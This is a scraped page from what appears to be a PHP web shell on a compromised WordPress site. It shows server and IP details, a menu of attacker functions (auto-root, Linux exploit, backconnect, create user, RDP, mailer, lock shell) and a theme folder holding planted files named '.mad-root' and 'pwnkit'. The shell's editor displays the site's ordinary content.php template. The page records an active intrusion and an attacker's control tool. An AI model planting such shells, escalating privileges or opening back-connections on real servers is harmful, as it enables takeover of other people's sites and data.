Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
TF89388 /
wp-content /
themes /
noisa /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
icons
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
vc_templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1021
B
-rw-r--r--
archive.php
2.28
KB
-rw-r--r--
author.php
2.29
KB
-rw-r--r--
category.php
2.28
KB
-rw-r--r--
comments.php
4.94
KB
-rw-r--r--
content-custom.php
484
B
-rw-r--r--
content-page.php
599
B
-rw-r--r--
content-search.php
2.35
KB
-rw-r--r--
content-single.php
753
B
-rw-r--r--
content.php
11.43
KB
-rw-r--r--
footer.php
1.46
KB
-rw-r--r--
functions-extended.php
16.18
KB
-rw-r--r--
functions.php
25.77
KB
-rw-r--r--
header.php
4.85
KB
-rw-r--r--
index.php
1.88
KB
-rw-r--r--
page.php
1.33
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
0
B
-rw-r--r--
screenshot.png
496.33
KB
-rw-r--r--
search.php
2.27
KB
-rw-r--r--
searchform.php
356
B
-rw-r--r--
sidebar-category.php
498
B
-rw-r--r--
sidebar-custom.php
1.13
KB
-rw-r--r--
sidebar-footer-col1.php
446
B
-rw-r--r--
sidebar-footer-col2.php
446
B
-rw-r--r--
sidebar-footer-col3.php
446
B
-rw-r--r--
sidebar-slidebar.php
441
B
-rw-r--r--
sidebar.php
484
B
-rw-r--r--
single-noisa_artists.php
1.71
KB
-rw-r--r--
single-noisa_events.php
1.74
KB
-rw-r--r--
single-noisa_gallery.php
5.98
KB
-rw-r--r--
single-noisa_releases.php
1.74
KB
-rw-r--r--
single.php
1.74
KB
-rw-r--r--
style.css
147.06
KB
-rw-r--r--
tag.php
2.27
KB
-rw-r--r--
taxonomy.php
14.91
KB
-rw-r--r--
woocommerce.php
2.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content.php
<?php /** * Theme Name: Noisa * Theme Author: Mariusz Rek - Rascals Themes * Theme URI: http://rascalsthemes.com/noisa * Author URI: http://rascalsthemes.com * File: content-single.php * @package noisa * @since 1.0.0 */ // Get panel options $noisa_opts = noisa_opts(); // Set width and height if ( $noisa_layout === 'wide' || $noisa_layout === 'thin' ) { $width = 1090; $height = 613; $thumb_size = 'noisa-full-thumb'; } else { $width = 780; $height = 440; $thumb_size = 'noisa-main-thumb'; } if ( $noisa_layout === 'blog_grid' ) { $width = 780; $height = 440; $thumb_size = 'large'; } // Date format $date_format = get_option( 'date_format' ); // Disqus $disqus = $noisa_opts->get_option( 'disqus_comments' ); $disqus_shortname = $noisa_opts->get_option( 'disqus_shortname' ); if ( ( $disqus && $disqus === 'on' ) && ( $disqus_shortname && $disqus_shortname !== '' ) ) { $disqus = true; } else { $disqus = false; } // Post format $post_format = get_post_meta( $wp_query->post->ID, '_post_format', true ); ?> <article id="post-<?php the_ID(); ?>" <?php post_class( 'blog-article xfolkentry hentry' ); ?>> <?php if ( ! is_single() ) : ?> <header class="article-header"> <span class="meta-cats"><?php the_category( ' ' ) ?></span> <?php the_title( '<h2 class="article-title"><a class="entry-title" href="' . esc_url( get_permalink() ) . '" rel="bookmark">', '</a></h2>' ); ?> <div class="meta-top"> <div class="meta-col"> <span class="meta-author-image"><?php echo get_avatar( get_the_author_meta( 'email' ), '24' ); ?></span> <div class="meta-author"> <a href="<?php echo get_author_posts_url( $post->post_author ); ?>" class="author-name author"><?php echo get_the_author_meta( 'display_name', $post->post_author ); ?></a> </div> </div> <div class="meta-col"> <span class="meta-date published updated" title="<?php the_time('Y-m-d\TH:i:s\Z') ?>"><?php the_time( $date_format ); ?></span> </div> <div class="meta-col"> <span class="meta-comments"> <a href="<?php echo esc_url( get_permalink() ); ?>#comments" class="comments-link"><?php if ( ! $disqus ) { comments_number('0','1','%'); } else { echo ' '; } ?> </a> </span> </div> </div> </header><!-- .article-header --> <?php endif;?> <?php // Post Type Image if ( get_post_format() === 'image' ) : ?> <?php // Single if ( is_single() && $noisa_opts->get_option( 'display_featured_image_ipf' ) === 'on' && has_post_thumbnail() ) : ?> <div class="article-media content-image featured-image"> <img src="<?php echo esc_url( wp_get_attachment_url( get_post_thumbnail_id( $post->ID ) ) ); ?>" alt="<?php esc_attr_e( 'Post Image', 'noisa' ); ?>"> </div> <?php endif; ?> <?php // List if ( ! is_single() && has_post_thumbnail() ) : ?> <div class="article-media content-image featured-image"> <a href="<?php echo esc_url( get_permalink() ) ?>" class="thumb"> <?php $img_src = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), $thumb_size ); ?> <img src="<?php echo esc_url( $img_src[0] ); ?>" alt="<?php esc_attr_e( 'Post Image', 'noisa' ); ?>"> </a> </div> <?php endif; ?> <?php // Post Type Link elseif ( get_post_format() === 'link' ) : ?> <?php $link_title = get_post_meta( $wp_query->post->ID, '_link_title', true ); $link_url = get_post_meta( $wp_query->post->ID, '_link_url', true ); $link_new_window = get_post_meta( $wp_query->post->ID, '_link_new_window', true ); if ( ( $link_title && $link_title !== '' ) && ( $link_url && $link_url !== '' ) ) : ?> <div class="article-media"> <?php if ( $link_new_window && $link_new_window === 'on' ) { $target = '_blank'; } else { $target = '_self'; } ?> <a class="pf-link" href="<?php echo esc_url( $link_url ) ?>" target="<?php echo esc_attr( $target ) ?>"><?php echo esc_html( $link_title ) ?></a> </div> <?php endif; // if link ?> <?php // Post Type Quote elseif ( get_post_format() === 'quote' ) : ?> <?php $quote_text = get_post_meta( $wp_query->post->ID, '_quote_text', true ); $quote_author = get_post_meta( $wp_query->post->ID, '_quote_author', true ); $quote_link = get_post_meta( $wp_query->post->ID, '_quote_link', true ); if ( $quote_text && $quote_text !== '' ) : ?> <div class="article-media"> <p class="quote-text"><?php echo esc_html( $quote_text ) ?> <br> <?php if ( $quote_author && $quote_author !== '' ) : ?> <cite> <?php if ( $quote_link && $quote_link !== '' ) : ?> <a href="<?php echo esc_url( $quote_link ) ?>"><?php echo esc_html( $quote_author ) ?></a> <?php else : ?> <?php echo esc_html( $quote_author ) ?> <?php endif; ?> </cite> <?php endif ?> </p> </div> <?php endif; // if quote text ?> <?php // Post Type Gallery elseif ( get_post_format() === 'gallery' ) : ?> <?php $gallery_slider_id = get_post_meta( $wp_query->post->ID, '_gallery_slider_id', true ); if ( $gallery_slider_id && $gallery_slider_id !== 'none' ) : ?> <div class="article-media"> <?php if ( function_exists( 'noisa_slider' ) ) { echo noisa_slider( array( 'id' => $gallery_slider_id, 'size' => $thumb_size ) ); } ?> </div> <?php endif; // if slider ids ?> <?php // Post Type Audio elseif ( get_post_format() === 'audio' ) : ?> <?php // Soundcloud if ( $post_format === 'pf_audio_sc' ) : $sc_iframe = get_post_meta( $wp_query->post->ID, '_sc_iframe', true ); if ( $sc_iframe && $sc_iframe !== '' && strpos( $sc_iframe, 'iframe' ) !== false ) : ?> <div class="article-media sc-iframe"> <?php echo str_replace( '&', '&', $sc_iframe ); ?> </div> <?php endif; // $sc_iframe ?> <?php // Audio tracks elseif ( $post_format === 'pf_audio_album' ) : ?> <div class="article-media sc-audio"> <?php $pf_tracks_id = get_post_meta( $wp_query->post->ID, '_pf_tracks_id', true ); $album_title = get_post_meta( $wp_query->post->ID, '_album_title', true ); $album_artists = get_post_meta( $wp_query->post->ID, '_album_artists', true ); $album_image = get_post_meta( $wp_query->post->ID, '_album_image', true ); if ( ! isset( $album_image ) || $album_image === '' ) { $album_image = get_post_thumbnail_id( $post->ID ); } if ( function_exists( 'noisa_single_album' ) ) { echo noisa_single_album( $atts = array( 'id' => $pf_tracks_id, 'album_title' => $album_title, 'album_artists' => $album_artists, 'album_cover' => $album_image ) ); } ?> </div> <?php endif; // post_format ?> <?php // Post Type Video elseif ( get_post_format() === 'video' ) : ?> <?php $video_yt_id = get_post_meta( $wp_query->post->ID, '_video_yt_id', true ); $video_vimeo_id = get_post_meta( $wp_query->post->ID, '_video_vimeo_id', true ); if ( $video_yt_id && $video_yt_id !== '' ) : ?> <div class="article-media content-video"> <div class="video"> <iframe src="https://www.youtube.com/embed/<?php echo esc_attr( $video_yt_id ) ?>" width="<?php echo esc_attr( $width ) ?>" height="<?php echo esc_attr( $height ) ?>" allowfullscreen></iframe> </div> </div> <?php endif; // video_yt_id ?> <?php if ( $video_vimeo_id && $video_vimeo_id !== '' ) : ?> <div class="article-media content-video"> <div class="video"> <iframe src="https://player.vimeo.com/video/<?php echo esc_attr( $video_vimeo_id ) ?>" width="<?php echo esc_attr( $width ) ?>" height="<?php echo esc_attr( $height ) ?>" allowfullscreen></iframe> </div> </div> <?php endif; // video_vimeo_id ?> <?php // Default Content else : ?> <?php if ( has_post_thumbnail() ) : ?> <?php if ( is_single() && $noisa_opts->get_option( 'display_featured_image' ) === 'on' ) : ?> <div class="article-media content-image featured-image"> <img src="<?php echo esc_url( wp_get_attachment_url( get_post_thumbnail_id( $post->ID ) ) ); ?>" alt="<?php esc_attr_e( 'Post Image', 'noisa' ); ?>"> </div> <?php elseif ( ! is_single() ) : ?> <div class="article-media content-image featured-image"> <a href="<?php echo esc_url( get_permalink() ) ?>" class="thumb"> <?php $img_src = wp_get_attachment_image_src( get_post_thumbnail_id( $post->ID ), $thumb_size ); ?> <img src="<?php echo esc_url( $img_src[0] ); ?>" alt="<?php esc_attr_e( 'Post Image', 'noisa' ); ?>"> </a> </div> <?php endif; ?> <?php endif; ?> <?php endif; // post type ?> <div class="article-content entry-content"> <?php if ( ! is_single() && has_excerpt() ) { the_excerpt(); echo '<a href="' . esc_url( get_permalink() ) . '" class="more-link-excerpt">' . esc_html__( 'Read more', 'noisa' ) . '</a>'; } else { the_content( esc_html__( 'Read more', 'noisa' ) ); } ?> <?php if ( get_the_title() === '' ) { the_excerpt(); echo '<a href="' . esc_url( get_permalink() ) . '" class="more-link-excerpt">' . esc_html__( 'Read more', 'noisa' ) . '</a>'; } ?> <?php if ( is_single() && $noisa_layout !== 'vc' ) : ?> <div class="meta-bottom"> <?php if ( function_exists('noisa_toolkit') && noisa_toolkit() ) : ?> <div class="meta-col"> <span class="meta-share-title"><?php esc_html_e( 'Share in', 'noisa' ); ?></span> <?php if ( function_exists( 'noisa_share_buttons' ) ) { echo noisa_share_buttons( $post->ID ); } ?> </div> <?php endif; ?> <div class="meta-col"> <span class="meta-tags-title"><?php esc_html_e( 'Tagged in', 'noisa' ); ?></span> <?php the_tags( '<span class="meta-tags">', ' ', '</span>' ); ?> </div> </div> <div class="clear"></div> <?php wp_link_pages( array( 'before' => '<div class="page-links">' . esc_html__( 'Jump to Page', 'noisa' ), 'after' => '</div>', ) ); ?> <?php endif; // single ?> </div><!-- .entry-content --> </article><!-- #post-## -->
Close